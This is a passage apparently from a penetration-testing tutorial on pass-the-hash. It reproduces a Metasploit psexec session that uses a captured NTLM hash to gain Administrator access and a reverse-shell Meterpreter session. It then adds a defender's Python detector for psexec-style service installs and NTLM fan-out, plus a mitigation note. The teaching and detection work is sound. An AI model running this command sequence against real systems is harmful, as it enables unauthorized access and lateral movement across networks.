In the preceding example, we ran into a slight complication: We have the administrator’s username and password hashes, but we can’t crack the password in a reasonable time frame. If we don’t know the password, how can we log into additional machines and potentially compromise more systems with this one user account?
We can use the pass-the-hash technique, which requires that we have only the password hash, not the password itself. Metasploit’s windows/smb/psexec module makes this all possible, as shown here:
msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
. . . SNIP . . .
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
SMBPass => aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \JsOvAFLy.exe...
After we select the smb/psexec module and set the options for LHOST, LPORT, and RHOST, we set the SMBPass variable and input the hash that we dumped earlier. As you can see, authentication is successful and we gain our Meterpreter session. We didn't have to crack a password, and no password was needed. We've secured Administrator privileges using the password hash alone.
When we successfully compromise one system on a large network, in most cases that system will have the same administrator account on multiple systems. This attack would allow us to hop from one system to another without ever needing to crack the password itself.
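From the defender's side, the transcript above leaves two artifacts worth hunting for: the psexec module installs a service whose binary is a randomly named executable dropped into the ADMIN$ share (the "Created \JsOvAFLy.exe" line), and a pass-the-hash logon shows up on the target as a network (type 3) logon authenticated with NTLM rather than Kerberos. The SMBPass value itself is the LM and NTLM hashes joined by a colon; the LM half shown here, aad3b435b51404eeaad3b435b51404ee, is the LM hash of an empty password, which is what a host with LM hashing disabled stores. The following Python is an added detection example written for this page, not code from the book or from Metasploit. It runs over constructed, simplified log lines in a `host|event_id|key=value;...` layout of my own (the real events are Windows System log Event ID 7045, "a service was installed", and Security log Event ID 4624, "an account was successfully logged on"); the eight-letter service-name heuristic is taken from the name pattern visible in the transcript and is an assumption about what a psexec-style install looks like, not a rule the page states.

```python
import re
from collections import defaultdict

# Constructed sample events for this example (not real logs). Layout: host|event_id|key=value;...
# 7045 = service installed (System log); 4624 = successful logon (Security log).
SAMPLE_EVENTS = [
    "SRV01|7045|ServiceName=JsOvAFLy;ImagePath=%SystemRoot%\\JsOvAFLy.exe",
    "SRV01|7045|ServiceName=Spooler;ImagePath=C:\\Windows\\System32\\spoolsv.exe",
    "SRV02|7045|ServiceName=kQmZxPwt;ImagePath=%SystemRoot%\\kQmZxPwt.exe",
    "SRV01|4624|TargetUserName=Administrator;LogonType=3;AuthenticationPackageName=NTLM;IpAddress=192.168.33.129",
    "SRV02|4624|TargetUserName=Administrator;LogonType=3;AuthenticationPackageName=NTLM;IpAddress=192.168.33.129",
    "SRV03|4624|TargetUserName=Administrator;LogonType=3;AuthenticationPackageName=NTLM;IpAddress=192.168.33.129",
    "SRV04|4624|TargetUserName=alice;LogonType=3;AuthenticationPackageName=Kerberos;IpAddress=192.168.33.50",
]

# Heuristic (assumption): psexec-style installs use an 8-letter random service name
# whose binary of the same name sits directly under %SystemRoot% (the ADMIN$ share).
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{8}$")


def parse_event(line):
    """Split one constructed log line into a dict of fields plus host and event_id."""
    host, event_id, details = line.split("|", 2)
    fields = dict(kv.split("=", 1) for kv in details.split(";"))
    fields["host"] = host
    fields["event_id"] = int(event_id)
    return fields


def is_psexec_style_service(ev):
    """True when a 7045 event matches the random-name-in-system-root pattern."""
    if ev["event_id"] != 7045:
        return False
    name = ev.get("ServiceName", "")
    image = ev.get("ImagePath", "")
    binary = image.rsplit("\\", 1)[-1]
    # Exactly one path separator: the binary lives directly in %SystemRoot%, not in a subfolder.
    in_sysroot = image.upper().startswith("%SYSTEMROOT%\\") and image.count("\\") == 1
    return bool(RANDOM_SERVICE_NAME.match(name)) and binary.lower() == f"{name.lower()}.exe" and in_sysroot


def suspicious_service_installs(lines):
    """Return (host, service name) for every service install matching the heuristic."""
    return [(ev["host"], ev["ServiceName"]) for ev in map(parse_event, lines) if is_psexec_style_service(ev)]


def ntlm_lateral_fanout(lines, min_hosts=3):
    """Group NTLM network logons by (account, source IP) and keep pairs that reached
    at least min_hosts distinct machines: one account hopping across the network."""
    seen = defaultdict(set)
    for ev in map(parse_event, lines):
        if (ev["event_id"] == 4624 and ev.get("LogonType") == "3"
                and ev.get("AuthenticationPackageName") == "NTLM"):
            seen[(ev["TargetUserName"], ev["IpAddress"])].add(ev["host"])
    return {key: sorted(hosts) for key, hosts in seen.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    print("psexec-style service installs:", suspicious_service_installs(SAMPLE_EVENTS))
    print("NTLM fan-out by (account, source):", ntlm_lateral_fanout(SAMPLE_EVENTS))
```

Neither check is conclusive on its own: legitimate tools also install services with short names, and an administrator may well log on to several hosts over NTLM. What makes the pair useful is correlation, a service install with a throwaway name arriving right after an NTLM network logon from a source that is not a management host. The mitigation for the underlying problem the chapter describes (one local Administrator hash valid on many machines) is to stop sharing that credential across hosts, for example with per-machine local administrator passwords, so that a hash dumped from one system does not authenticate to the next.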